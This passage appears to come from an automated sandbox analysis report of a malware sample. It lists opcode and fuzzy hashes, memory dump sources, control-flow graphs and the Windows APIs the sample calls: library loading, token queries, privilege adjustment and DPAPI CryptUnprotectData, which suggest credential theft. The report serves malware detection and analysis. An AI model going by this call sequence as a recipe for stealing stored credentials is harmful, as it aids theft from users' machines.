                                                                                                                                            • Instruction ID: f56c67ea5f663ed0fd058e68a532fb70e8ea0fe36cca7b30664deb0fecf9aebe
                                                                                                                                            • Opcode Fuzzy Hash: fa183498867d98e9356e4ac35f3a351d9ae57fb48f6390ade0b684df1b242077
                                                                                                                                            • Instruction Fuzzy Hash: 43319378D14209DFCB54DFA8D494E9EBBB1FF48704F208659E412AB3A5CB34A981CF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5f5610e5db7cdd51e526d05d82b3fc1e13c5f69ad42f2576771442f42f074473
                                                                                                                                            • Instruction ID: 564695dc5904db3fa5c40719a59185fec29ea0dea107f6cec1b582f6dbb9a7c1
                                                                                                                                            • Opcode Fuzzy Hash: 5f5610e5db7cdd51e526d05d82b3fc1e13c5f69ad42f2576771442f42f074473
                                                                                                                                            • Instruction Fuzzy Hash: 78E0922418F6908FC31797B1A9249ADBF709D8331432A81CBC04BDB693C6440D8D97A7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 82ecc1a668df613c53e27fd553a1e524702619fa2916f09142e5f8cc000fd8f8
                                                                                                                                            • Instruction ID: 3e200caee710b6384dad4fd5475fb68302dab9aa4ee335ced08fde87755bd966
                                                                                                                                            • Opcode Fuzzy Hash: 82ecc1a668df613c53e27fd553a1e524702619fa2916f09142e5f8cc000fd8f8
                                                                                                                                            • Instruction Fuzzy Hash: 6FF09E70D49648EFCB54DFE5D5405ADBFB0EB49340F2185AA840A97224E6304A85DF81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0db13516012bbc4954dcc29422b71ad5ae45e03fa622c780571b7b836e1139ed
                                                                                                                                            • Instruction ID: f5e6e4d98aa4ecf2b4f80c28296d90ecf63fa8b1d51627abc6fdc4076c7b29ed
                                                                                                                                            • Opcode Fuzzy Hash: 0db13516012bbc4954dcc29422b71ad5ae45e03fa622c780571b7b836e1139ed
                                                                                                                                            • Instruction Fuzzy Hash: 7DF0C070D04208EFCB50DFA5D4409ADBFF4EB49340F2085AA840AE7214EA309A40AFD1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 49ac1a5d183bf92114c7d17d34e74583485dbb6061bf29c5425d486129e2845f
                                                                                                                                            • Instruction ID: f3bb416feca67124122333958ce3473d90d58eb0960f33d17ddf6e8b2ca8561b
                                                                                                                                            • Opcode Fuzzy Hash: 49ac1a5d183bf92114c7d17d34e74583485dbb6061bf29c5425d486129e2845f
                                                                                                                                            • Instruction Fuzzy Hash: B5E0EC6910E3C04FD317D720D962849BFA19B92100B198ACEC4824FADBD6259947C743
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1238005077.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_a60000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e3eff179dfc73bf03d90fdb62805cc3f2addce5e76dffbc8c72725a848ec8ef0
                                                                                                                                            • Instruction ID: 1946fce3bf0d46054e1bf2382ea46fc91f299d8a60eb82dffee176c667dca4d6
                                                                                                                                            • Opcode Fuzzy Hash: e3eff179dfc73bf03d90fdb62805cc3f2addce5e76dffbc8c72725a848ec8ef0
                                                                                                                                            • Instruction Fuzzy Hash: 65D0223128C920CB0206A7F4F814C7FBBB8E681729322C02BE20F87200CE500D8033DB

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:14.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:58.3%
                                                                                                                                            Total number of Nodes:24
                                                                                                                                            Total number of Limit Nodes:2
                                                                                                                                            execution_graph 9424 7ffaacce6228 9425 7ffaacce622f LoadLibraryExW 9424->9425 9427 7ffaacce632c 9425->9427 9395 7ffaacceb115 9396 7ffaacceb13e 9395->9396 9397 7ffaacceb2e5 9396->9397 9398 7ffaacceb39f NtQueryInformationToken 9396->9398 9399 7ffaacceb457 9398->9399 9400 7ffaacceed85 9401 7ffaacceed93 AdjustTokenPrivileges 9400->9401 9403 7ffaacceeeff 9401->9403 9428 7ffaacce7a21 9429 7ffaacce7a4f CryptUnprotectData 9428->9429 9431 7ffaacce7c59 9429->9431 9404 7ffaacce6070 9407 7ffaacce2398 9404->9407 9406 7ffaacce6079 9407->9406 9408 7ffaacce60a0 9407->9408 9409 7ffaacce62cc LoadLibraryExW 9408->9409 9411 7ffaacce61bb 9408->9411 9410 7ffaacce632c 9409->9410 9410->9406 9411->9406 9420 7ffaacce9d2b 9421 7ffaacceb320 NtQueryInformationToken 9420->9421 9423 7ffaacceb457 9421->9423
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$"r
                                                                                                                                            • API String ID: 0-960922235
                                                                                                                                            • Opcode ID: 454ef85ba952a2d899f23fba44a80b883bc7e569c790d4797e0d510db9f3a3d7
                                                                                                                                            • Instruction ID: f031b6ffd0b3cd52e556cc711139ef497c37253729e9da536862955006cc56ba
                                                                                                                                            • Opcode Fuzzy Hash: 454ef85ba952a2d899f23fba44a80b883bc7e569c790d4797e0d510db9f3a3d7
                                                                                                                                            • Instruction Fuzzy Hash: 3BA29570619A4A8FEB95EF2CC455AB93BE1FF5A300F1845B9E44ECB292DF25E805C740
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: /$/
                                                                                                                                            • API String ID: 0-972056843
                                                                                                                                            • Opcode ID: 059496c935a81d685a7e48ea2d5ee18c6fdde246a1557bcda08b35207fac7fbd
                                                                                                                                            • Instruction ID: ed4d3fd91506d8c17a759430dfd6e5e93a1215516a66bc0b57a742ce547e6705
                                                                                                                                            • Opcode Fuzzy Hash: 059496c935a81d685a7e48ea2d5ee18c6fdde246a1557bcda08b35207fac7fbd
                                                                                                                                            • Instruction Fuzzy Hash: D2B20970919A1D8FEBA5EF28C895BA9B7B1FF55301F1041E9D00DD7291DB35AA84CF80

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1373 7ffaacceb115-7ffaacceb13c 1374 7ffaacceb186-7ffaacceb1a9 1373->1374 1375 7ffaacceb13e-7ffaacceb166 1373->1375 1381 7ffaacceb1ac-7ffaacceb1fa call 7ffaacce9d28 1374->1381 1376 7ffaacceb168 1375->1376 1377 7ffaacceb16d-7ffaacceb184 1375->1377 1376->1377 1377->1374 1385 7ffaacceb206-7ffaacceb21d 1381->1385 1386 7ffaacceb1fc-7ffaacceb205 1381->1386 1385->1381 1387 7ffaacceb21f-7ffaacceb230 1385->1387 1386->1385 1389 7ffaacceb2e6-7ffaacceb302 1387->1389 1390 7ffaacceb236-7ffaacceb243 1387->1390 1393 7ffaacceb245-7ffaacceb26d 1390->1393 1394 7ffaacceb29b 1390->1394 1402 7ffaacceb276 1393->1402 1395 7ffaacceb317-7ffaacceb455 NtQueryInformationToken 1394->1395 1396 7ffaacceb29d 1394->1396 1416 7ffaacceb457 1395->1416 1417 7ffaacceb45d-7ffaacceb4a9 1395->1417 1398 7ffaacceb2e4 1396->1398 1399 7ffaacceb29f-7ffaacceb2a8 call 7ffaacce9c68 1396->1399 1398->1402 1403 7ffaacceb2e5 1398->1403 1407 7ffaacceb2ad-7ffaacceb2d3 1399->1407 1404 7ffaacceb278-7ffaacceb297 1402->1404 1405 7ffaacceb2d5-7ffaacceb2dd 1402->1405 1403->1389 1410 7ffaacceb308-7ffaacceb30f 1404->1410 1411 7ffaacceb299 1404->1411 1405->1403 1409 7ffaacceb2df-7ffaacceb2e2 1405->1409 1407->1405 1409->1398 1414 7ffaacceb312-7ffaacceb315 1410->1414 1415 7ffaacceb311 1410->1415 1411->1394 1414->1395 1415->1414 1416->1417
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 203c3287996ef1e5b388f5540def1c2010ce39c267fa9e775dd7e2549565c969
                                                                                                                                            • Instruction ID: 72c8358f8739472f3eac76f92f0af2a4fcdfde448104a34605c0afc8fd34a1e3
                                                                                                                                            • Opcode Fuzzy Hash: 203c3287996ef1e5b388f5540def1c2010ce39c267fa9e775dd7e2549565c969
                                                                                                                                            • Instruction Fuzzy Hash: 56D11870D0965D8FEB98DF58D894BEDB7B1EF5A310F1041AAD00DE3292DB74A984CB44

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1454 7ffaacce7a21-7ffaacce7a65 1456 7ffaacce7a67-7ffaacce7aaa 1454->1456 1457 7ffaacce7aaf-7ffaacce7b46 1454->1457 1456->1457 1460 7ffaacce7bb7-7ffaacce7bc5 1457->1460 1461 7ffaacce7b48-7ffaacce7b4a 1457->1461 1462 7ffaacce7bc6-7ffaacce7bcc 1460->1462 1461->1462 1463 7ffaacce7b4c 1461->1463 1468 7ffaacce7bd4-7ffaacce7c57 CryptUnprotectData 1462->1468 1464 7ffaacce7b4e-7ffaacce7b68 1463->1464 1465 7ffaacce7b9b-7ffaacce7bb6 1463->1465 1464->1465 1465->1460 1469 7ffaacce7c59 1468->1469 1470 7ffaacce7c5f-7ffaacce7cd2 1468->1470 1469->1470
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                            • Opcode ID: 2094ec891e07b9b6bfe9b15ca6bda99bbf7b205614a7b84a5640f3182628be75
                                                                                                                                            • Instruction ID: 638192c8a6b6af40902ca49c2585a9c0a327bd55215345ba14c7de4f5a485f26
                                                                                                                                            • Opcode Fuzzy Hash: 2094ec891e07b9b6bfe9b15ca6bda99bbf7b205614a7b84a5640f3182628be75
                                                                                                                                            • Instruction Fuzzy Hash: 1E815974D08A5D8FEB98DF18C849BE9BBF1FF5A300F0042AAD44DE3251DB7599848B81

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1475 7ffaacceed85-7ffaacceed91 1476 7ffaacceed93-7ffaacceed9b 1475->1476 1477 7ffaacceed9c-7ffaacceeefd AdjustTokenPrivileges 1475->1477 1476->1477 1480 7ffaacceef05-7ffaacceef75 1477->1480 1481 7ffaacceeeff 1477->1481 1481->1480
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustPrivilegesToken
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2874748243-0
                                                                                                                                            • Opcode ID: d6c4e4892970fbfb66d506343896f0459a1632daacbec4e128a6a92e263c0d68
                                                                                                                                            • Instruction ID: 9244f87f5e5f9b247dae973c1d9aee903d6bb5858309623baa7c5c14de4ca467
                                                                                                                                            • Opcode Fuzzy Hash: d6c4e4892970fbfb66d506343896f0459a1632daacbec4e128a6a92e263c0d68
                                                                                                                                            • Instruction Fuzzy Hash: DC61F27490861D8FDB98DF68C885BE9BBB1FB6A310F1041AED44DE3252DB74A985CB40

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1484 7ffaacceb305-7ffaacceb455 NtQueryInformationToken 1490 7ffaacceb457 1484->1490 1491 7ffaacceb45d-7ffaacceb4a9 1484->1491 1490->1491
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationQueryToken
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4239771691-0
                                                                                                                                            • Opcode ID: 7e11b98525873bf826521fc844216168060aba6a4c496b5b185282008986a76f
                                                                                                                                            • Instruction ID: 6471165a36e63bbacd3ba344eefde1b8c11b63d767a1f3994a0dd0504e8a71fa
                                                                                                                                            • Opcode Fuzzy Hash: 7e11b98525873bf826521fc844216168060aba6a4c496b5b185282008986a76f
                                                                                                                                            • Instruction Fuzzy Hash: 97511670908A5C8FDB98DF58D894BE9BBF1FB6A310F1081AED04DE3251DA70A985CF44

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1493 7ffaacce9d2b-7ffaacceb455 NtQueryInformationToken 1497 7ffaacceb457 1493->1497 1498 7ffaacceb45d-7ffaacceb4a9 1493->1498 1497->1498
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InformationQueryToken
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4239771691-0
                                                                                                                                            • Opcode ID: b5ce2e286d928f431549753c0b0240b7b117280f05a44134f33b743d4baf4e93
                                                                                                                                            • Instruction ID: 1d6bac989585e3077fe34f075a69d56df2e0c6629be6bb640bce77354f147591
                                                                                                                                            • Opcode Fuzzy Hash: b5ce2e286d928f431549753c0b0240b7b117280f05a44134f33b743d4baf4e93
                                                                                                                                            • Instruction Fuzzy Hash: 0C51E370908A1C8FDB98DF58D885BE9BBB1FB6A310F1091AED44DE3251DB70A985CF44
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: /
                                                                                                                                            • API String ID: 0-1686368129
                                                                                                                                            • Opcode ID: 8ea666ab07dae5df1739b3f5ec13a56c8804d4c2141e2fcaf330ce75dce4a47a
                                                                                                                                            • Instruction ID: e5c42bedcc5b4af523ba0dd22b5860a7e418a0109559c82050f3f15eb6380c2c
                                                                                                                                            • Opcode Fuzzy Hash: 8ea666ab07dae5df1739b3f5ec13a56c8804d4c2141e2fcaf330ce75dce4a47a
                                                                                                                                            • Instruction Fuzzy Hash: EBE1B871D1AA1D8FEBA5EF14C855BA8B7B1FF5A300F5041E9D04DE3192DB34AA85CB80
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                            • Opcode ID: 7e2cb6d772b935446966aa8900820766f91d64e90bc6dbf260bebf8adc8b6926
                                                                                                                                            • Instruction ID: 5b545b7d63d663040b6f4dc4ae92d0cb29f4ace873d5e0a2e5e4d05a4f8c5d33
                                                                                                                                            • Opcode Fuzzy Hash: 7e2cb6d772b935446966aa8900820766f91d64e90bc6dbf260bebf8adc8b6926
                                                                                                                                            • Instruction Fuzzy Hash: 9641A570918A1D8FDBA4DF18C884BE9B7B1FB59300F0092A9D44DA3255DB74AA848F45
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: /
                                                                                                                                            • API String ID: 0-1686368129
                                                                                                                                            • Opcode ID: 1a722593d17750d720dc417096d4c59c11f2daa07b1efe362909ba17c004bf6a
                                                                                                                                            • Instruction ID: c296f23992a11898ab344a838aa66ca5025951651b2866852ee7f03129c898f6
                                                                                                                                            • Opcode Fuzzy Hash: 1a722593d17750d720dc417096d4c59c11f2daa07b1efe362909ba17c004bf6a
                                                                                                                                            • Instruction Fuzzy Hash: 01D1C570909A1D8FEBA9EF14C895BE9B7B1FF55304F1045E9D00EE3291DA35AA85CF80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2bde2af7efe1bbac6ab4745f1c1e671011ffd2291b37983ce3269238757cb99d
                                                                                                                                            • Instruction ID: 28475bab6ef206c50d2770f983ae6e3c8b5705f27c9155a1cce165e1fd6e9421
                                                                                                                                            • Opcode Fuzzy Hash: 2bde2af7efe1bbac6ab4745f1c1e671011ffd2291b37983ce3269238757cb99d
                                                                                                                                            • Instruction Fuzzy Hash: 54B1C670D0961D8FEBA9DF18C895BA8B7B1FF5A305F5041E9D00DE7291DA34AA85CF40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c8a9bb14e68252fe37aa79513a17b669583008d9c01ff7d87d42b9e6842e47b
                                                                                                                                            • Instruction ID: e10fa3e988eef188099ee451c018822c38adea1183ba7096c3eff0308456a5fe
                                                                                                                                            • Opcode Fuzzy Hash: 2c8a9bb14e68252fe37aa79513a17b669583008d9c01ff7d87d42b9e6842e47b
                                                                                                                                            • Instruction Fuzzy Hash: E0318430E09618CFDBA9EF58D890AECB3B5EB5A304F5051A5D00DE7255DA34EE85CF44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a21ce35719b942140d45564ec2d3b698e8aec1108cf5cd4dfc1f6abf911e3de7
                                                                                                                                            • Instruction ID: cf78127399740556f827e23348530c4125f39c9887881265ff5a7e948002c111
                                                                                                                                            • Opcode Fuzzy Hash: a21ce35719b942140d45564ec2d3b698e8aec1108cf5cd4dfc1f6abf911e3de7
                                                                                                                                            • Instruction Fuzzy Hash: 1FC01232A0140ACA8B08EE68E0011FAB331EB87225F1024BAD10CE3190CB32E8268BC4

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1419 7ffaacce2398-7ffaacce60be 1421 7ffaacce60c4-7ffaacce60c9 1419->1421 1422 7ffaacce61ec-7ffaacce61f6 1419->1422 1423 7ffaacce60cf-7ffaacce60e7 1421->1423 1424 7ffaacce61bb-7ffaacce61d0 1421->1424 1429 7ffaacce61f7-7ffaacce62b0 1422->1429 1425 7ffaacce60e9-7ffaacce60f9 1423->1425 1426 7ffaacce60fb-7ffaacce611f 1423->1426 1425->1426 1426->1429 1431 7ffaacce6125-7ffaacce6130 1426->1431 1444 7ffaacce62b2-7ffaacce62c9 1429->1444 1445 7ffaacce62cc-7ffaacce632a LoadLibraryExW 1429->1445 1431->1424 1433 7ffaacce6136-7ffaacce613e 1431->1433 1433->1429 1435 7ffaacce6144-7ffaacce6150 1433->1435 1436 7ffaacce61a3-7ffaacce61ab 1435->1436 1437 7ffaacce6152-7ffaacce615e 1435->1437 1436->1429 1439 7ffaacce61ad-7ffaacce61b5 1436->1439 1437->1429 1440 7ffaacce6164-7ffaacce6178 1437->1440 1439->1424 1439->1433 1442 7ffaacce61d1-7ffaacce61d6 1440->1442 1443 7ffaacce617a-7ffaacce618f 1440->1443 1446 7ffaacce6191-7ffaacce61a1 1442->1446 1443->1446 1444->1445 1448 7ffaacce6332-7ffaacce6384 1445->1448 1449 7ffaacce632c 1445->1449 1446->1436 1452 7ffaacce61d8-7ffaacce61eb 1446->1452 1449->1448
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                            • Opcode ID: 20e55077ab501ed0aeac1ab2e99402f0bd0df3e896e323a49dd1ac4f2f69f830
                                                                                                                                            • Instruction ID: 30478e8b8653e859b6f67f3b53806dd9b6b590bd9ccb94bdc48a6114f2578c0f
                                                                                                                                            • Opcode Fuzzy Hash: 20e55077ab501ed0aeac1ab2e99402f0bd0df3e896e323a49dd1ac4f2f69f830
                                                                                                                                            • Instruction Fuzzy Hash: 5BA1AF70A18A0D8FEB59DF58D885AB8B7F1FF5A310F14416ED04ED3262DB35A846CB80

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1500 7ffaacce6228-7ffaacce62b0 1504 7ffaacce62b2-7ffaacce62c9 1500->1504 1505 7ffaacce62cc-7ffaacce632a LoadLibraryExW 1500->1505 1504->1505 1506 7ffaacce6332-7ffaacce6384 1505->1506 1507 7ffaacce632c 1505->1507 1507->1506
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                            • Opcode ID: ea429a39c887105a389e55cbf5fdae68f73cd3126d2656decf0a2d0ba451733c
                                                                                                                                            • Instruction ID: 227dce0fbb375abbd0625df5cbe6c6e12bf0869a781bf87a94441ddb3830f97f
                                                                                                                                            • Opcode Fuzzy Hash: ea429a39c887105a389e55cbf5fdae68f73cd3126d2656decf0a2d0ba451733c
                                                                                                                                            • Instruction Fuzzy Hash: 4251E770908A1C8FEB98EF98D889BE9BBF1FB69311F10416ED00DE7251DB719985CB40
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: b4
                                                                                                                                            • API String ID: 0-3371602342
                                                                                                                                            • Opcode ID: 31ec952c70215187fba6ed5b851c6ddbec866001a0e363e2c03040898c18228b
                                                                                                                                            • Instruction ID: d47fd4156c6b2f2a79276033836a6e9a720ac348883605ef5b911e742b2998a7
                                                                                                                                            • Opcode Fuzzy Hash: 31ec952c70215187fba6ed5b851c6ddbec866001a0e363e2c03040898c18228b
                                                                                                                                            • Instruction Fuzzy Hash: CD127D70919A8DCFEB68DF28C855BE97BE1FF56300F10416AD84EC7292DB34A945CB81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3edfe7c0e198d24b282272c9a4a33e1be74935d4e8b1e0ca901e43c4d968ace
                                                                                                                                            • Instruction ID: db333950fedebd6ad3155939f80c7fe75151c962a11b631c2b1bf5220fa0bb80
                                                                                                                                            • Opcode Fuzzy Hash: a3edfe7c0e198d24b282272c9a4a33e1be74935d4e8b1e0ca901e43c4d968ace
                                                                                                                                            • Instruction Fuzzy Hash: 39817674918A8D8FDBA8DF28C845BE97BE1FF5A310F10812AE84DC7251DB74D945CB81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
